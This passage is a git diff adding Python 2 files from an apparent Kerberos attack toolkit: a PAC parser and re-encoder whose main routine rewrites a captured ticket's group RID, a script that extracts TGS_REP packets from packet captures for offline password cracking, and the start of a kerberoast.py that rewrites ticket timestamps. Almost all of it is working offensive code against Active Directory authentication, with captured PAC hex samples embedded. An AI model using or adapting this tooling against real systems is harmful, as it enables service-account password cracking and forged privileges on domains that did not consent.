diff --git a/PAC.py b/PAC.py
new file mode 100644
index 0000000..eed1204
--- /dev/null
+++ b/PAC.py
@@ -0,0 +1,601 @@
+#!/usr/local/bin/python2 -tt
+
+import struct
+import collections
+from abc import ABCMeta, abstractmethod
+#from datetime import datetime,timedelta
+import datetime
+import math
+
+def BytesToTime(b):
+	# The FILETIME structure is a 64-bit value that represents the number of 
+	# 100-nanosecond intervals that have elapsed since January 1, 1601 (UTC).
+	mftime = struct.unpack('<Q', b)[0]	
+	if mftime == 0x7fffffffffffffff:
+		return None
+	else:
+		microseconds = struct.unpack('<Q', b)[0] / 10.0
+		nanoseconds = (struct.unpack('<Q', b)[0] % 10000000) * 100
+		
+		dt = datetime.datetime(1601,1,1) + datetime.timedelta(microseconds=microseconds)
+
+		dtn  = datetimenano(dt, nanosecond=nanoseconds)
+
+		return dtn
+
+def TimeToBytes(time):
+	if time == None:
+		return '\xff\xff\xff\xff\xff\xff\xff\x7f' # 0x7fffffffffffffff LE
+	else:
+		td = time - datetime.datetime(1601,1,1)
+		#seconds = math.floor(td.total_seconds())
+		hundredsofnano = long(math.floor(td.total_seconds()) * 10000000)
+
+		if hasattr(time, 'nanosecond'):
+			hundredsofnano += long(time.nanosecond / 100)
+		else:
+			hundredsofnano += long(time.microseconds * 10)
+
+		return struct.pack('<Q', hundredsofnano)
+
+		'''
+		if hasattr(time, 'nanosecond'):
+			#microseconds = ((td.total_seconds() * 1000000) + td.microseconds)
+			#replace microseconds for nanoseconds
+			#microseconds = microseconds - time.microsecond
+			#nanoseconds = microseconds * 1000 + time.nanoseconds
+			nanoseconds = ((td.total_seconds() * 1000000000) + time.nanosecond)
+
+			print 'seconds     %i' % (math.floor(td.total_seconds()))
+			print 'nanoseconds %i' % time.nanosecond
+
+			return struct.pack('<Q', nanoseconds)
+			hundredsofnano = nanoseconds / 100
+		else:
+			#microseconds = ((td.total_seconds() * 1000000) + td.microseconds) * 10
+			microseconds = ((td.total_seconds() * 1000000) + td.microseconds)
+			hundredsofnano = microseconds * 10
+		print '%15f' % hundredsofnano
+		return struct.pack('<Q', hundredsofnano)
+		'''
+
+def PrettyTime(time):
+	if time == None:
+		return 'Infinity'
+	else:
+		return str(time)
+
+def AlignedString(s, alignment = 4):
+	return s + '\x00' * ((alignment - (len(s) % alignment)) % alignment)
+
+
+class datetimenano(datetime.datetime):
+	def __new__(cls, *args, **kwargs):
+		if len(args) > 0 and type(args[0]) == datetime.datetime:
+			dt = args[0]
+
+			#dt = datetime.datetime.__new__(cls, dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo)
+			if 'nanosecond' in kwargs:
+				#setattr(dt, 'nanoseconds', args[0].tzinfo)
+				dt = datetime.datetime.__new__(cls, dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo)
+				setattr(dt, 'nanosecond', kwargs['nanosecond'])
+			else:
+				#setattr(dt, 'nanoseconds', 0)
+				dt = datetime.datetime.__new__(cls, dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond, dt.tzinfo, nanoseconds=0)
+				setattr(dt, 'nanosecond', 0)
+			return dt
+		else:
+			dt = super(datetimenano, cls).__new__(cls, *args[:8], **kwargs)
+			if len(args) == 9:
+				setattr(cls, 'nanosecond', args[8])
+			else:
+				setattr(cls, 'nanosecond', 0)
+			return dt			
+
+	def __str__(self):
+		s = super(datetimenano, self).__str__()
+		return '%s.%09i' % (s.split('.')[0], self.nanosecond)
+		return s
+
+class PacInfoStructure(object):
+	__metaclass__ = ABCMeta
+
+	PrettyName = 'PacInfoStructure'
+
+	Type = None
+	PrettyName = None
+	BufferSize = None
+	Offset = None
+	Data = None
+
+
+	def __init__(self, pac, index=0):
+		if input != None:
+			offset = 8 + 16 * index
+
+			self.Type, self.BufferSize, self.Offset = struct.unpack('<III', pac[offset:offset+12])
+			self.Data = pac[self.Offset:self.Offset+self.BufferSize]
+
+	def __str__(self):
+		return '%s (%i) Size: %i  Offset: %i\nData: %s' % (self.PrettyName, self.Type, self.BufferSize, self.Offset, self.Data.encode('hex'))
+
+	#def encode(self):
+	#	e = str(struct.pack('<III', self.Type, self.BufferSize, self.Offset)) + self.encode()
+	#	return e
+
+	#@abstractmethod
+	def encode(self):
+		return self.Data
+
+class PacLoginInfo(PacInfoStructure):
+	Version = None
+	ByteOrder = None
+	HeaderLen = None
+	FillBytes = None
+	InitialLength = None
+
+	Type = 1
+	PrettyName = 'Login Info'
+	#ReferentID = None
+	LogonTime = None
+	KickoffTime = None
+	PwdLastSet = None
+	PwdCanChange = None
+	PwdMustChange = None
+
+	Logoncount = None
+	BadpPasswordCount = None
+	UserRid = None
+	GroupRid = None
+	
+	AccountName = None
+	DisplayName = None
+	LogonScript = None
+	ProfilePath = None
+	HomeDir = None
+	DirDrive = None
+
+
+
+	#LogonCount
+
+	class Referent(object):
+		Length = None
+		Size = None
+		ReferentID = None
+		Groups = []
+
+		def __init__(self, data):
+			self.Length = struct.unpack('<H', data[0:2])[0]
+			self.Size = struct.unpack('<H', data[2:4])[0]
+			self.ReferentID = struct.unpack('<L', data[4:8])[0]
+
+		def __str__(self):
+			return 'Length: %i  Size: %i  ReferentID: 0x%08x' % (self.Length, self.Size, self.ReferentID)
+
+		@property
+		def PaddLen(self):
+			# must bye 4 byte aligned
+			return (4 - (self.Length % 4)) % 4
+
+	def __init__(self, pac, index=0):
+		super(self.__class__, self).__init__(pac, index)
+		if self.Type != 1:
+			raise ValueError('PAC Information Structure is not Login Info')
+
+		#self.MesHeader = self.Data[0:16]
+		#MessageHeader
+		self.Version, self.ByteOrder, self.HeaderLen = struct.unpack('<BBH', self.Data[0:4])
+		self.FillBytes = self.Data[4:8]
+		self.InitialLength = struct.unpack('<Q', self.Data[8:16])[0]
+
+
+		#self.ReferentD = self.Data[16:20]
+
+		self.LogonTime = BytesToTime(self.Data[20:28])
+		#print 'Logon Time: %s' % PrettyTime(self.LogonTime)
+		self.LogoffTime = BytesToTime(self.Data[28:36])
+		#print 'Logoff Time: %s' % PrettyTime(self.LogoffTime)
+		self.KickoffTime = BytesToTime(self.Data[36:44])
+		#print 'Kickoff Time: %s' % PrettyTime(self.KickoffTime)
+		self.PwdLastSet = BytesToTime(self.Data[44:52])
+		#print 'PwdLastSet Time: %s' % PrettyTime(self.PwdLastSet)
+		self.PwdCanChange = BytesToTime(self.Data[52:60])
+		#print 'PwdCanChange Time: %s' % PrettyTime(self.PwdCanChange)
+		self.PwdMustChange = BytesToTime(self.Data[60:68])
+		#print 'PwdMustChange Time: %s' % PrettyTime(self.PwdMustChange)
+
+		accountnameref = self.Referent(self.Data[68:76])
+		# print 'accountnameref %s' % accountnameref
+		fullnameref = self.Referent(self.Data[76:84])
+		#print fullnameref
+		logonscriptref = self.Referent(self.Data[84:92])
+		#print logonscriptref
+		profilepathref = self.Referent(self.Data[92:100])
+		#print profilepathref
+		homedirref = self.Referent(self.Data[100:108])
+		#print homedirref
+		dirdriveref = self.Referent(self.Data[108:116])
+		#print dirdriveref
+		self.Logoncount, self.BadpPasswordCount, self.UserRid, self.GroupRid, numrids = struct.unpack('<HHLLL', self.Data[116:132]) #[0]
+
+		DATAOFFSET = 236
+
+		# TODO: Decode and re-encode this
+		self.extrajunk = self.Data[132:DATAOFFSET]
+
+					
+		offset = DATAOFFSET # points to first data item
+		offset += 4 * 3 # max count, offset, actual count
+		self.AccountName = self.Data[offset:offset+accountnameref.Length]#.decode('utf-8')
+		#print '%i %s' % (offset, self.AccountName)
+		offset += accountnameref.Length + accountnameref.PaddLen
+
+		offset += 4 * 3 # max count, offset, actual count
+		self.DisplayName = self.Data[offset:offset+fullnameref.Length]#.decode('utf-8')
+		#print '%i %s' % (offset, self.DisplayName)
+		offset += fullnameref.Length + fullnameref.PaddLen
+
+		offset += 4 * 3 # max count, offset, actual count
+		self.LogonScript = self.Data[offset:offset+logonscriptref.Length]
+		#print '%i %s' % (offset, self.LogonScript)
+		offset += logonscriptref.Length + logonscriptref.PaddLen
+
+		offset += 4 * 3 # max count, offset, actual count
+		self.ProfilePath = self.Data[offset:offset+profilepathref.Length]
+		#print '%i %s' % (offset, self.ProfilePath)
+		offset += profilepathref.Length + logonscriptref.PaddLen
+
+		offset += 4 * 3 # max count, offset, actual count
+		self.HomeDir = self.Data[offset:offset+homedirref.Length]
+		#print '%i %s' % (offset, self.HomeDir)
+		offset += homedirref.Length + homedirref.PaddLen
+
+		offset += 4 * 3 # max count, offset, actual count
+		self.DirDrive = self.Data[offset:offset+dirdriveref.Length]
+		#print '%i %s' % (offset, self.DirDrive)
+		offset += homedirref.Length + dirdriveref.PaddLen
+
+
+		#outtest = self.AccountName
+		#print '!!!! AN Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
+
+		#outtest = self.DisplayName #fullname
+		#print '!!!! FN Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
+
+		#outtest = self.LogonScript
+		#print '!!!! LS Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
+
+		#outtest = self.ProfilePath
+		#print '!!!! PP Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
+
+		#outtest = self.HomeDir
+		#print '!!!! HD Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
+
+		#outtest = self.DirDrive
+		#print '!!!! DD Length: %i  --%s--  %s' % (len(outtest), outtest, outtest.encode('hex'))
+
+		maxridcount = struct.unpack('<L', self.Data[offset:offset+4])[0]
+		#print 'maxrid', maxridcount
+		offset += 4
+		grouprids = []
+		for i in range(numrids):
+			#print self.Data[offset:offset+12].encode('hex')
+			grouprids.append(struct.unpack('<L', self.Data[offset:offset+4])[0])
+			offset += 8
+
+		self.Groups = grouprids
+
+		# TODO: Decode and re-encode this
+		self.extrajunk2 = self.Data[offset:]
+
+
+	def encode(self):
+		header = struct.pack('<BBH', self.Version, self.ByteOrder, self.HeaderLen) + \
+			self.FillBytes 
+		#	struct.pack('<QL', self.InitialLength,
+
+		e = struct.pack('<L', 0x00020000) + \
+			TimeToBytes(self.LogonTime) + \
+			TimeToBytes(self.LogoffTime) + \
+			TimeToBytes(self.KickoffTime) + \
+			TimeToBytes(self.PwdLastSet) + \
+			TimeToBytes(self.PwdCanChange) + \
+			TimeToBytes(self.PwdMustChange) + \
+			struct.pack('<HHL', len(self.AccountName), len(self.AccountName), 0x00020004) + \
+			struct.pack('<HHL', len(self.DisplayName), len(self.DisplayName), 0x00020008) + \
+			struct.pack('<HHL', len(self.LogonScript), len(self.LogonScript), 0x0002000c) + \
+			struct.pack('<HHL', len(self.ProfilePath), len(self.ProfilePath), 0x00020010) + \
+			struct.pack('<HHL', len(self.HomeDir),     len(self.HomeDir),     0x00020014) + \
+			struct.pack('<HHL', len(self.DirDrive),    len(self.DirDrive),    0x00020018) + \
+			struct.pack('<HHLLL', self.Logoncount, self.BadpPasswordCount, self.UserRid, self.GroupRid, len(self.Groups))
+		
+		# TODO: Decode and re-encode this
+		e += self.extrajunk
+
+		e +=struct.pack('<LLL', len(self.AccountName)/2, 0, len(self.AccountName)/2) + AlignedString(self.AccountName) + \
+			struct.pack('<LLL', len(self.DisplayName)/2, 0, len(self.DisplayName)/2) + AlignedString(self.DisplayName) + \
+			struct.pack('<LLL', len(self.LogonScript)/2, 0, len(self.LogonScript)/2) + AlignedString(self.LogonScript) + \
+			struct.pack('<LLL', len(self.ProfilePath)/2, 0, len(self.ProfilePath)/2) + AlignedString(self.ProfilePath) + \
+			struct.pack('<LLL', len(self.HomeDir)/2,     0, len(self.HomeDir)/2)     + AlignedString(self.HomeDir)     + \
+			struct.pack('<LLL', len(self.DirDrive)/2,    0, len(self.DirDrive)/2)    + AlignedString(self.DirDrive)
+
+		# Groups
+		e += struct.pack('<L', len(self.Groups))
+		for g in self.Groups:
+			e += struct.pack('<LL', g, 7)
+
+		# TODO: Decode and re-encode this
+		e += self.extrajunk2
+
+		header += struct.pack('<Q', len(e))
+
+		#print 'LogInInfoLen %i' % len(e)
+
+		#e += struct.pack('<LLL', len(self.AccountName), 0, len(self.AccountName)) #+ AlignedString(self.AccountName)
+
+		return header + e
+
+class PacClientInfo(PacInfoStructure):
+	Type = 10
+	PrettyName = 'Client Info'
+	ClientID = None
+	Name = None
+
+	def __init__(self, pac, index=0):
+		super(self.__class__, self).__init__(pac, index)
+		if self.Type != 10:
+			raise ValueError('PAC Information Structure is not Client Info')
+
+		self.ClientID = BytesToTime(self.Data[:8])
+		namelen = struct.unpack('<H', self.Data[8:10])[0]
+		self.Name = self.Data[10:10+namelen].encode('utf-8')
+
+
+	def __str__(self):
+		return '%s (%i) ClientID: %s  Name (%i): %s' % (self.PrettyName, self.Type, str(self.ClientID), len(self.Name), self.Name)
+
+	def encode(self):			
+		return TimeToBytes(self.ClientID) + struct.pack('<H', len(self.Name)) + self.Name
+
+class PacUpnDnsInfo(PacInfoStructure):
+	Type = 12
+	PrettyName = 'UPN DNS Info'
+	UPNName = None
+	DNSName = None
+	Flags = None
+
+	def __init__(self, pac, index=0):
+		super(self.__class__, self).__init__(pac, index)
+		if self.Type != 12:
+			raise ValueError('PAC Information Structure is not UPN DNS Info')
+		upnlen = struct.unpack('<H', self.Data[:2])[0]
+		upnoffset = struct.unpack('<H', self.Data[2:4])[0]
+		dnslen = struct.unpack('<H', self.Data[4:6])[0]
+		dnsoffset = struct.unpack('<H', self.Data[6:8])[0]
+		self.Flags = self.Data[8:12] # screw decoding this
+
+		#print upnlen, upnoffset, dnslen, dnsoffset
+
+		self.UPNName = self.Data[upnoffset:upnoffset+upnlen].decode('utf-8')
+		self.DNSName = self.Data[dnsoffset:dnsoffset+dnslen].decode('utf-8')
+
+	def __str__(self):
+		return '%s (%i) Flags: %s  UPN Name: %s  DNS Name: %s' % (self.PrettyName, self.Type, '%0.8X' % struct.unpack('<L', self.Flags)[0], self.UPNName, self.DNSName)
+
+	def encode(self):
+		# seems to add lots of \x00\x00\x00\x00 at the end of strings
+		return struct.pack('<HHHH', \
+			# UPN Len \
+			len(self.UPNName), \
+			# UPN Offset \
+			16, \
+			# DNS Len \
+			len(self.DNSName), \
+			# DNS Offset \
+			20+len(AlignedString(self.UPNName))) + \
+			self.Flags + '\x00\x00\x00\x00' + str(AlignedString(self.UPNName)) + '\x00\x00\x00\x00' + str(AlignedString(self.DNSName))
+
+class PacServerChecksum(PacInfoStructure):
+	Type = 6
+	PrettyName = 'Server Checksum'
+	SigType = None
+	SigVal = None
+
+	def __init__(self, pac, index=0):
+		super(self.__class__, self).__init__(pac, index)
+		if self.Type != 6:
+			raise ValueError('PAC Information Structure is not Server Checksum')
+		self.SigType = struct.unpack('<l', self.Data[:4])[0]
+		self.SigVal = self.Data[4:]
+
+	def __str__(self):
+		return '%s (%i) Size: %i  Sig Type: %i  SigVal: %s' % (self.PrettyName, self.Type, len(self.encode()), self.SigType, self.SigVal.encode('hex'))
+
+	def encode(self):
+		#return self.Data
+		return struct.pack('<l', self.SigType) + self.SigVal
+
+class PacKdcChecksum(PacInfoStructure):
+	Type = 7
+	PrettyName = 'Privsvr Checksum'
+	SigType = None
+	SigVal = None
+
+	def __init__(self, pac, index=0):
+		super(self.__class__, self).__init__(pac, index)
+		if self.Type != 7:
+			raise ValueError('PAC Information Structure is not KDC (Privsvr) Checksum')
+		self.SigType = struct.unpack('<l', self.Data[:4])[0]
+		self.SigVal = self.Data[4:]
+
+	def __str__(self):
+		return '%s (%i) Size: %i  Sig Type: %i  SigVal: %s' % (self.PrettyName, self.Type, len(self.encode()), self.SigType, self.SigVal.encode('hex'))
+
+	def encode(self):
+		#return self.Data
+		return struct.pack('<l', self.SigType) + self.SigVal
+
+class PacGenericInfo(PacInfoStructure):
+	# Just in case there are other structures besides the original 5
+	Type = None
+
+	def __init__(self, pac, index=0):
+		super(self.__class__, self).__init__(pac, index)
+
+	def encode(self):
+		#return self.Data
+		super(self.__class__, self).__init__()
+
+
+class PAC(object):
+	_pac=None
+	_loaded = False
+	Version = 0
+
+	PacLoginInfo = None
+	PacClientInfo = None
+	PacUpnDnsInfo = None
+	PacServerChecksum = None
+	PacKdcChecksum = None
+
+	def __init__(self, pac=None):
+
+		if pac == None:
+			_pac = None
+			_loaded = False
+		else:
+			self.load(pac)
+
+	def __str__(self):
+		retval  = str(self.PacLoginInfo)
+		retval += str(self.PacClientInfo)
+		retval += str(self.PacUpnDnsInfo)
+		retval += str(self.PacServerChecksum)
+		retval += str(self.PacKdcChecksum)
+		return retval
+
+	def load(self, pac):
+		numentries, self.Version = struct.unpack('<II', pac[:8])
+
+		#pacinfostructures = {}
+		pacinfostructures = collections.defaultdict(lambda: PacGenericInfo)
+		for cls in PacInfoStructure.__subclasses__():
+			pacinfostructures[cls.Type] = cls
+
+
+		for i in range(numentries):
+			# 8 - num entries (4) and version (4)
+			offset = 8 + 16 * i
+			# get the type of the chunk
+			typeval = struct.unpack('<L', pac[offset:offset+4])[0]
+			# load the right class
+			cls = pacinfostructures[typeval]
+			pis = cls(pac, i)
+
+			if pis.Type == 1:
+				self.PacLoginInfo = pis
+			elif pis.Type == 10:
+				self.PacClientInfo = pis
+			elif pis.Type == 12:
+				self.PacUpnDnsInfo = pis
+			elif pis.Type == 6:
+				self.PacServerChecksum = pis
+			elif pis.Type == 7:
+				self.PacKdcChecksum = pis
+
+			if pis.Data != pis.encode():
+				print "NO MATCH!! %s" % pis.PrettyName
+
+				cmp(pis.Data, pis.encode(), verbose=True)
+				#print '%s\n%s' % (pis.Data.encode('hex'), pis.encode().encode('hex'))
+				print '----'
+
+
+	def encode(self):
+		e = struct.pack('<LL', 5, self.Version)
+
+		# the inital offset value is always 88
+		# ok, so I lied. it is actually the sum of a bunch of crap that doesn't seem to change
+		offset = 88
+		alignedoffset = 88
+
+		headers = ''
+		payload = ''
+
+		pacstructs = [self.PacLoginInfo, self.PacClientInfo, self.PacUpnDnsInfo, self.PacServerChecksum, self.PacKdcChecksum]
+
+		for ps in pacstructs:
+			pse = ps.encode()
+			psealigned = AlignedString(pse, 8)
+
+			headers += struct.pack('<IIII', ps.Type, len(pse), offset, 0)
+			payload += psealigned
+
+			#print '%16s Offset: %3s  Aligned Offset: %3s  Length: %3s  Aligned Length: %3s' % (ps.PrettyName, offset, alignedoffset, len(psed), len(AlignedString(psed, 8)))
+
+			offset += len(psealigned)
+
+		return e + headers + payload
+
+
+
+def cmp(s1, s2, comparelen=None, verbose=False):
+	if not comparelen:
+		if len(s1) <= len(s2):
+			comparelen = len(s1)
+		else:
+			comparelen = len(s2)
+
+	if s1[:comparelen] == s2[:comparelen]:
+		if verbose:
+			print 'SAME %i %i' % (len(s1), len(s2))
+		return True
+	else:
+		if verbose:
+			print 'NOT SAME'
+			print s1[:comparelen].encode('hex')
+			print
+			print s2[:comparelen].encode('hex')
+		return False
+
+
+
+def main():
+	#a ='050000000000000001000000b001000058000000000000000a0000000e00000008020000000000000c000000480000001802000000000000060000001400000060020000000000000700000014000000780200000000000001100800cccccccca001000000000000000002005ee808c4fecdcf01ffffffffffffff7fffffffffffffff7f1ac0dc109ec6cf011a80463b67c7cf01ffffffffffffff7f04000400040002000400040008000200000000000c000200000000001000020000000000140002000000000018000200b30000005204000000020000010000001c000200200000000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c00020000000000000000000000000002000000000000000200000074006d0002000000000000000200000074006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000200000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb10100000030000200070000000100000001010000000000120100000000000000800eafcefecdcf01040074006d0000001c00100016003000010000000000000074006d0040006d006500640069006e002e006c006f00630061006c00000000004d004500440049004e002e004c004f00430041004c00000076ffffffce1884addcbeade3e2eb24d9920a294f0000000076ffffff6cb8692b47afb295b541b4fe9a0a058c00000000'
+
+	# xp-success
+	#a = '050000000000000001000000a801000058000000000000000a0000000e00000000020000000000000c000000480000001002000000000000060000001400000058020000000000000700000014000000700200000000000001100800cccccccc9801000000000000000002006cd0e2cf07afce01ffffffffffffff7fffffffffffffff7f6595bf65d875ce0165552990a176ce01ffffffffffffff7f04000400040002000000000008000200000000000c000200000000001000020000000000140002000000000018000200460000005204000001020000010000001c000200200000000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c00020000000000000000000000000002000000000000000200000074006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010200000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb10100000030000200070000000100000001010000000000120100000080dc05d007afce01040074006d0000001c00100016003000010000000000000074006d0040006d006500640069006e002e006c006f00630061006c00000000004d004500440049004e002e004c004f00430041004c00000076ffffffd0293d55a40ae227b4826d87f5f3806b0000000076ffffffb7b53a4ac414e436a7e58845f5e419c000000000'
+
+	# 7-success
+	#a = '050000000000000001000000b001000058000000000000000a0000000e00000008020000000000000c000000480000001802000000000000060000001400000060020000000000000700000014000000780200000000000001100800cccccccca00100000000000000000200c605fb3210d5cf01ffffffffffffff7fffffffffffffff7f1ac0dc109ec6cf011a80463b67c7cf01ffffffffffffff7f04000400040002000400040008000200000000000c000200000000001000020000000000140002000000000018000200c20000005204000001020000010000001c000200200000000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c00020000000000000000000000000002000000000000000200000074006d0002000000000000000200000074006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010200000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb1010000003000020007000000010000000101000000000012010000000000000080353e9110d5cf01040074006d0000001c00100016003000010000000000000074006d0040006d006500640069006e002e006c006f00630061006c00000000004d004500440049004e002e004c004f00430041004c00000076ffffff7383d9c6b5854086d8997b5ac7a632260000000076ffffff20bfc7689277658ad2c21fdc475d6c2300000000'
+
+	# 7-success-administrator
+	#a = '0500000000000000010000003002000058000000000000000a0000002400000088020000000000000c00000060000000b002000000000000060000001400000010030000000000000700000014000000280300000000000001100800cccccccc2002000000000000000002008d5c003e13d5cf01ffffffffffffff7fffffffffffffff7f0f29e0c9d775ce010fe949f4a076ce01ffffffffffffff7f1a001a00040002001a001a0008000200000000000c00020000000000100002000000000014000200000000001800020078000000f401000001020000060000001c000200200200000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c0002003400020001000000380002000d000000000000000d000000410064006d0069006e006900730074007200610074006f00720000000d000000000000000d000000410064006d0069006e006900730074007200610074006f00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000008020000070000000102000007000000000200000700000007020000070000000602000007000000650400000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb10100000030000200070000000100000001010000000000120100000004000000010400000000000515000000bffab31eb43b681af8cdadb1010000003c0200000700002000000000808bb97613d5cf011a00410064006d0069006e006900730074007200610074006f0072000000000032001000160048000000000000000000410064006d0069006e006900730074007200610074006f00720040006d006500640069006e002e006c006f00630061006c000000000000004d004500440049004e002e004c004f00430041004c00000076ffffff84faca5fb556ef458c3200e64a3b96ca0000000076ffffff051fc3c03c92775ab3a24d24dc11a19700000000'
+
+	# ram
+	a = '050000000000000001000000b001000058000000000000000a0000000e00000008020000000000000c000000480000001802000000000000060000001400000060020000000000000700000014000000780200000000000001100800cccccccca001000000000000000002005ee808c4fecdcf01ffffffffffffff7fffffffffffffff7f1ac0dc109ec6cf011a80463b67c7cf01ffffffffffffff7f04000400040002000400040008000200000000000c000200000000001000020000000000140002000000000018000200b30000005204000001020000010000001c000200200000000000000000000000000000000000000008000a00200002000a000c00240002002800020000000000000000001002000000000000000000000000000000000000000000000000000000000000010000002c00020000000000000000000000000002000000000000000200000074006d0002000000000000000200000074006d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010200000700000005000000000000000400000044004300300031000600000000000000050000004d004500440049004e00000004000000010400000000000515000000bffab31eb43b681af8cdadb10100000030000200070000000100000001010000000000120100000000000000800eafcefecdcf01040074006d0000001c00100016003000010000000000000074006d0040006d006500640069006e002e006c006f00630061006c00000000004d004500440049004e002e004c004f00430041004c00000076ffffffce1884addcbeade3e2eb24d9920a294f0000000076ffffff6cb8692b47afb295b541b4fe9a0a058c00000000'
+
+	a = a.decode('hex')
+
+	p = PAC(a)
+	print p.PacLoginInfo.GroupRid
+	p.PacLoginInfo.GroupRid = 77
+	print p.PacLoginInfo.GroupRid
+	#print p
+
+
+	p2 = p.encode()
+
+	#cmp(a, p2, None, True)
+
+	print a == p2
+
+
+
+
+
+if __name__ == '__main__':
+	main()
+
+
diff --git a/extracttgsrepfrompcap.py b/extracttgsrepfrompcap.py
new file mode 100755
index 0000000..fa50ff9
--- /dev/null
+++ b/extracttgsrepfrompcap.py
@@ -0,0 +1,78 @@
+#!/usr/local/bin/python2 -tt
+
+from scapy.all import *
+import struct
+
+MESSAGETYPEOFFSETUDP = 17
+MESSAGETYPEOFFSETTCP = 21
+DEBUG = True
+
+TGS_REP = chr(13)
+
+def findkerbpayloads(packets, verbose=False):
+	kploads = []
+	i = 1
+	unfinished = {}
+	for p in packets:
+		# UDP
+		if p.haslayer(UDP) and p.sport == 88 and p[UDP].load[MESSAGETYPEOFFSETUDP] == TGS_REP:
+			if verbose: print "found UDP payload of size %i" % len(p[UDP].load) 
+			kploads.append(p[UDP].load)
+
+		#TCP
+		elif p.haslayer(TCP) and p.sport == 88 and p[TCP].flags & 23== 16: #ACK Only, ignore push (8), urg (32), and ECE (64+128)
+			# assumes that each TCP packet contains the full payload
+
+			if len(p[TCP].load) > MESSAGETYPEOFFSETTCP and p[TCP].load[MESSAGETYPEOFFSETTCP] == TGS_REP:
+				# found start of new TGS-REP
+				size = struct.unpack(">I", p[TCP].load[:4])[0]
+				if size + 4 == len(p[TCP].load):
+					kploads.append(p[TCP].load[4:size+4]) # strip the size field
+				else:
+					#print 'ERROR: Size is incorrect: %i vs %i' % (size, len(p[TCP].load))
+					unfinished[(p[IP].src, p[IP].dst, p[TCP].dport)] = (p[TCP].load[4:size+4], size)
+				if verbose: print "found TCP payload of size %i" % size
+			elif unfinished.has_key((p[IP].src, p[IP].dst, p[TCP].dport)):
+				ticketdata, size = unfinished.pop((p[IP].src, p[IP].dst, p[TCP].dport))
+				ticketdata += p[TCP].load
+				#print "cont: %i %i" % (len(ticketdata), size)
+				if len(ticketdata) == size:
+					kploads.append(ticketdata)
+				elif len(ticketdata) < size:
+					unfinished[(p[IP].src, p[IP].dst, p[TCP].dport)] = (ticketdata, size)
+				else:
+					# OH NO! Oversized!
+					print 'Too much data received! Source: %s Dest: %s DPort %i' % (p[IP].src, p[IP].dst, p[TCP].dport)
+
+
+	return kploads
+
+
+
+if __name__ == '__main__':
+	import argparse
+
+	parser = argparse.ArgumentParser(description='Find TGS_REP packets in a pcap file and write them for use cracking')
+	parser.add_argument('-f', '--pcap', dest='pcaps', action='append', required=True,
+					metavar='PCAPFILE', #type=file, #argparse.FileType('r'), 
+					help='a file to search for Kerberos TGS_REP packets')
+	parser.add_argument('-w', '--outputfile', dest='outfile', action='store', required=True, 
+					metavar='OUTPUTFILE', type=argparse.FileType('w'), 
+					help='the output file')
+	parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', default=False,
+					help='display verbose messages')
+
+	args = parser.parse_args()
+	kploads = []
+	for f in args.pcaps:
+		packets = rdpcap(f)
+		kploads += findkerbpayloads(packets, args.verbose)
+	if len(kploads) == 0:
+		print 'no payloads found'
+	else:
+		print 'writing %i hex encoded payloads to %s' % (len(kploads), args.outfile.name)
+	for p in kploads:
+		args.outfile.write(p.encode('hex') + '\n')
+
+	
+
diff --git a/kerberoast.py b/kerberoast.py
new file mode 100755
index 0000000..c338325
--- /dev/null
+++ b/kerberoast.py
@@ -0,0 +1,309 @@
+#!/usr/local/bin/python2 -tt
+
+import kerberos
+from pyasn1.codec.ber import encoder, decoder
+from pyasn1.type import univ, useful
+import struct
+import datetime
+import re
+import PAC
+
+
+def walk(t):
+	if type(t) == str:
+		print 'String: %s' % t
+	else:
+		print 'Length: %i' % len(t)
+		for i in range(len(t)):
+			print '---%i---' % i
+			print t[i]
+
+
+#Sequence().setComponentByPosition(0, BitString("'01000000101000010000000000000000'B")).setComponentByPosition(1, Sequence().setComponentByPosition(0, Integer(23)).setComponentByPosition(1, OctetString(hexValue='dfa121845d72f43271bbb33cd9e69443'))).setComponentByPosition(2, GeneralString('MEDIN.LOCAL')).setComponentByPosition(3, Sequence().setComponentByPosition(0, Integer(1)).setComponentByPosition(1, Sequence().setComponentByPosition(0, GeneralString('tm')))).setComponentByPosition(4, Sequence().setComponentByPosition(0, Integer(1)).setComponentByPosition(1, OctetString(''))).setComponentByPosition(5, GeneralizedTime('20140403172846Z')).setComponentByPosition(6, GeneralizedTime('20140403173119Z'))
+def updatetimestampsserverticket(ticket, authtime=None, starttime=None, endtime=None, renewtiltime=None):
+	now = datetime.datetime.now()
+	# yes, this regex isn't perfect, but neither are you
+	if not authtime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', authtime):
+		authtime = now.strftime('%Y%m%d%H%M%SZ')
+	if not starttime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', starttime):
+		starttime = now.strftime('%Y%m%d%H%M%SZ')
